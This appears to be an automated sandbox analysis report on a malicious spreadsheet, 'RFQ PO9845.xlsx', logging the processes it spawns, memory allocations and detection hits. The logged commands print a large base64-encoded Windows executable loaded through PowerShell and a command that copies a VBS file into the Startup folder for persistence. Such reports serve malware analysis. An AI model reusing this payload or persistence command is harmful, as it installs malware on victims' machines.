CgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCA
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 26368
Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 26368Jump to behavior
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01CAB2EE NtQuerySystemInformation,11_2_01CAB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01CAB2CC NtQuerySystemInformation,11_2_01CAB2CC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: RFQ PO9845.xlsxReversingLabs: Detection: 61%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....\.......d.......X...............................0.......#.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....\.......d.......................................0.......#.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../.......\.s.y.s.t.e.m.3.2.\.j.y.r.t.h.f.d.w.r.g...v.b.s.'..."...........0......./.......(.......6.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....\.......d...............Q.......................0......./.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.3...............................0.......;.......(.......".......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....\.......d.......................................0.......;.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....\.......d.......................................0.......G.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....\.......d.......................................0.......G.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....\.......d.......................................0.......S.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....\.......d...............3.......................0.......S.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......g.r.a.m.s.\.S.t.a.r.t.u.p.\. .W.k...v.b.s.'.)...................0......._.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....\.......d.......X.......|.......................0......._.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....\.......d.......X...............................0.......k.......................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....\.......d.......l...............................0.......k.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....\.......d.......X...............................0.......w...............f.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....\.......d.......X...............................0.......w.......(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d.......X.......4.......................0...............(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......X.......Q.......................0...............(...............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D...............(.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D...............E.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D...............m.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D.......................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D.......................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.6.0.9.2.........................0.......G...............(.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D.......................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D...............9.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D...............T.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D...............}.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D.......................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D.......................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D...............$.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............L.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............i.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............9.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............c.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............~.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............0.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............M.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............u.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............A ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............\ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................ ......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................!......................0.......+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D...............+!......................0.......+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D...............S!......................0.......7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D...............o!......................0.......7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D................!......................0.......C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D................!......................0.......C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D................!......................0.......O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D................!......................0.......O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D...............""......................0.......[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D...............="......................0.......[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D...............f"......................0.......g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................"......................0.......g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D................"......................0.......s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D................"......................0.......s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................"......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............7#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............R#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............{#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................#......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D..............."$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............L$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............g$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................$......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............9%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............a%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............}%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................%......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................&......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............0&......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............K&......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............t&......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................&......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D................&......................0.......'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D................&......................0.......'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D................'......................0.......3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D................'......................0.......3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D...............J'......................0.......?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D...............g'......................0.......?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................'......................0.......K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................'......................0.......K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D................'......................0.......W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D................'......................0.......W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D...............&(......................0.......c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D...............A(......................0.......c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D...............j(......................0.......o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................(......................0.......o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................(......................0.......{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................(......................0.......{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................(......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............<)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............Z)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................)......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............@*.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................*.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................*.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................+.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D................+.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D................+.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D...............B,.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................,.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................,.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............)-.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................-.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................-.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D................-.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D................-.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D...............%..........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D...............@..........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D...............i..........................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D..........................................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D..........................................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D..........................................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D..........................................~....o.......................................
